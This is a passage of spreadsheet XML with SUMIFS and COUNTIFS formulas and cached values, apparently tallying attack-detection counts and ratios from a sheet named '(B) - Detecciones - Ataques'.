        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>0</v>
      </c>
      <c r="DF60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>18</v>
      </c>
      <c r="DI60" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>0</v>
      </c>
      <c r="DJ60" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$BD3:$BD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>1</v>
      </c>
      <c r="DK60" s="271"/>
      <c r="DO60" s="279"/>
      <c r="DP60" s="271"/>
      <c r="DQ60" s="271"/>
      <c r="DR60" s="271"/>
      <c r="DS60" s="271"/>
      <c r="DT60" s="271"/>
      <c r="DU60" s="271"/>
      <c r="DV60" s="271"/>
      <c r="DW60" s="271"/>
      <c r="DX60" s="271"/>
      <c r="DY60" s="271"/>
      <c r="DZ60" s="271"/>
      <c r="EA60" s="271"/>
      <c r="EB60" s="271"/>
      <c r="EC60" s="271"/>
      <c r="ED60" s="280"/>
      <c r="EG60" s="279"/>
      <c r="EH60" s="271"/>
      <c r="EI60" s="358" t="s">
        <v>310</v>
      </c>
      <c r="EJ60" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S37 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK60" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S37 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="EL60" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S37 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="EM60" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI39,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S37 &amp; "*")</f>
        <v>7</v>
      </c>
      <c r="EN60" s="360">
        <f t="shared" si="37"/>
        <v>7</v>
      </c>
      <c r="EO60" s="364"/>
      <c r="EP60" s="456">
        <f t="shared" si="40"/>
        <v>0.2413793103</v>
      </c>
      <c r="EQ60" s="457">
        <f t="shared" si="41"/>
        <v>0.7586206897</v>
      </c>
      <c r="ER60" s="427">
        <f t="shared" si="42"/>
        <v>0.5</v>
      </c>
      <c r="ES60" s="427">
        <f t="shared" si="43"/>
        <v>0.4166666667</v>
      </c>
      <c r="ET60" s="427">
        <f t="shared" si="48"/>
        <v>1</v>
      </c>
      <c r="EU60" s="478"/>
      <c r="EV60" s="358" t="s">
        <v>357</v>
      </c>
      <c r="EW60" s="465">
        <f t="shared" ref="EW60:EZ60" si="54">IF(EJ38=0,"-",EJ59/EJ38)</f>
        <v>0.3333333333</v>
      </c>
      <c r="EX60" s="465">
        <f t="shared" si="54"/>
        <v>0.3846153846</v>
      </c>
      <c r="EY60" s="465">
        <f t="shared" si="54"/>
        <v>0.3333333333</v>
      </c>
      <c r="EZ60" s="466">
        <f t="shared" si="54"/>
        <v>0.1964285714</v>
      </c>
      <c r="FA60" s="479"/>
      <c r="FM60" s="480"/>
      <c r="FY60" s="379" t="s">
        <v>292</v>
      </c>
      <c r="FZ60" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA60" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GC60" s="379" t="s">
        <v>292</v>
      </c>
      <c r="GD60" s="368">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0.2</v>
      </c>
      <c r="GE60" s="369">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY60)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY60 &amp; "*"))</f>
        <v>0.2</v>
      </c>
    </row>
    <row r="61">
      <c r="J61" s="277"/>
      <c r="K61" s="481">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!BK3:BK139)</f>
        <v>30417</v>
      </c>
      <c r="L61" s="482">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!DA3:DA139)</f>
        <v>167159</v>
      </c>
      <c r="M61" s="482">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!EQ3:EQ139)</f>
        <v>4799156</v>
      </c>
      <c r="N61" s="473">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GG3:GG139)</f>
        <v>5037719</v>
      </c>
      <c r="O61" s="278"/>
      <c r="Q61" s="271"/>
      <c r="R61" s="352" t="s">
        <v>2527</v>
      </c>
      <c r="S61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>41</v>
      </c>
      <c r="T61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>182</v>
      </c>
      <c r="V61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>76</v>
      </c>
      <c r="W61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>28</v>
      </c>
      <c r="X61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>18569</v>
      </c>
      <c r="Y61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>811</v>
      </c>
      <c r="Z61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>159729</v>
      </c>
      <c r="AA61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>51</v>
      </c>
      <c r="AB61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>222</v>
      </c>
      <c r="AC61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>45</v>
      </c>
      <c r="AD61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AE61" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>61</v>
      </c>
      <c r="AF61" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6022</v>
      </c>
      <c r="AG61" s="271"/>
      <c r="AH61" s="352" t="s">
        <v>2527</v>
      </c>
      <c r="AI61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>30</v>
      </c>
      <c r="AJ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>10</v>
      </c>
      <c r="AL61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>163</v>
      </c>
      <c r="AR61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>5</v>
      </c>
      <c r="AS61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>3</v>
      </c>
      <c r="AU61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>7</v>
      </c>
      <c r="AV61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>46</v>
      </c>
      <c r="AY61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>2</v>
      </c>
      <c r="BA61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>28</v>
      </c>
      <c r="BB61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>18569</v>
      </c>
      <c r="BD61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>0</v>
      </c>
      <c r="BF61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>0</v>
      </c>
      <c r="BH61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>792</v>
      </c>
      <c r="BI61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>19</v>
      </c>
      <c r="BL61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>150381</v>
      </c>
      <c r="BN61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>9347</v>
      </c>
      <c r="BO61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>0</v>
      </c>
      <c r="BR61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>12</v>
      </c>
      <c r="BT61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>2</v>
      </c>
      <c r="BU61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>4</v>
      </c>
      <c r="BX61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>1</v>
      </c>
      <c r="BZ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>20</v>
      </c>
      <c r="CA61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>1</v>
      </c>
      <c r="CC61" s="355">
